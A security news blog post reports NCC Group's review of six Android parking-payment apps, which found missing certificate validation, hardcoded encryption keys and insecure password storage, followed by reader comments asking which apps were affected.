Vulnerable parking apps allow hackers to steal your login and credit card details

Parking meter

A review of several Android pay-for-parking applications has uncovered a series of vulnerabilities that could allow attackers to steal drivers' logins and hijack their mobile devices.

Conducted by information assurance firm NCC Group, the assessment analyzed six parking applications for the Android operating system. Some of the apps had been downloaded from Google Play between 5,000 and 10,000 times, whereas others boasted one million registered users.

The number of installs for each app ultimately did not matter, however, as all of the applications were affected by security vulnerabilities.

According to an NCC Group blog post the review determined that while all of the apps used encryption to protect their customers' sensitive information - something from which four major airlines should learn a lesson or two - not one verified the certificate used by the server.

Attackers could subsequently exploit this oversight to conduct man-in-the-middle (MITM) attacks, especially if the application used Android WebView and contained a bridge that could enable JavaScript running from WebView to access native device functions.

"In this scenario the attacker could inject HTML or JavaScript into the web page requested from the server. This script then executes within the context of the Android application and can potentially instruct the device to download a malicious payload from the attacker's server, providing access to the user's phone with the privileges of the application."

Screenshot 1

Chris Spencer of NCC Group adds that more persistent attacks could leverage an initial man-in-the-middle attack to eventually take control of the device. This is true even in the context of TLS/SSL encryption, though not all applications used this cryptographic standard.

One application in particular employed its own encryption standard that relied on keys stored in the application code. These keys, as well as the decryption method, could easily be retrieved, thereby allowing an attacker to steal users' login credentials and credit card information.

If those vulnerabilities weren't enough, most of the applications also exhibited flawed data storage procedures.

For example, some stored passwords and PINs locally on the device, which could lead to data theft if these pieces of information were not stored securely. One app tried to compensate for this by storing a user's unencrypted password in the application's private data directory on the phone, but NCC Group was able to exploit a file transversal vulnerability and recover it.

Password accessed

All of these vulnerabilities notwithstanding, the review did find that some of the apps had attempted to ward of attackers by using hashing algorithms and obfuscating their code.

NCC Group says that it responsibly disclosed details of the vulnerabilities to the app vendors.

Spencer writes that in order to protect their products from man-in-the-middle attacks, app developers should use a hashing algorithm, TLS, and Certificate Pinning, among other techniques.

As for the regular driver, it is highly ill-advised to use any application that could expose sensitive/financial information when you are connected to a public network. Sure, you might be connected to a data network only when paying for your parking. But even then, you might not be safe, as an attacker could create a fake GSM base station.

Ultimately, it might be better to just bring some change and pay for parking the old fashioned way.

flickr photo shared by compujeramey under a Creative Commons ( BY ) license.

Tags: , , ,

Smashing Security podcast
Check out "Smashing Security", the new weekly audio podcast, with Graham Cluley, Carole Theriault, and special guests from the world of information security.

"Three people having fun in an industry often focused on bad news" • "It's brilliant!" • "The Top Gear of computer security"

Latest episode:

, , ,

4 Responses

  1. Dan

    December 15, 2015 at 4:44 pm #

    Have there been any recent compromises with the parking meters that take credit cards instead of cash as well?

  2. Paul Eldred

    December 16, 2015 at 10:17 am #

    Can you name and shame these apps please?
    I was forced to use a parking app at the weekend (against my better judgment) because all four machines in the car park were out of action. Other shoppers said "<expletive deleted> I don't have a phone" and walked off without paying.

    • Graham Cluley in reply to Paul Eldred.

      December 16, 2015 at 2:12 pm #

      Unfortunately, NCC Group has chosen not to name them in its report – so we're as much in the dark as you.

      However, the report's authors are UK-based which narrows down the field somewhat and they give some indication of the user base for the apps.

      When I think of parking apps used in the UK a couple of names immediately spring to mind, so I would be surprised if they weren't amongst those that NCC tested.

      If anyone else knows more, please post a follow-up comment!

  3. David L

    December 16, 2015 at 3:29 pm #

    Webview and Java go to gather like Bonnie and Clyde! Infamous thieves,bank robbers.
    This is one of the major reasons Google pulled Webview out of the os to update through playstore. Many apps use the native Webview for connecting to the web. Any version of Android running 4.3 jellybean and lower are especially vulnerable. And any browsers on those can be easily compromised. Last time I checked,there were like 7-10 major vulnerabilities for the older operating systems.

Leave a Reply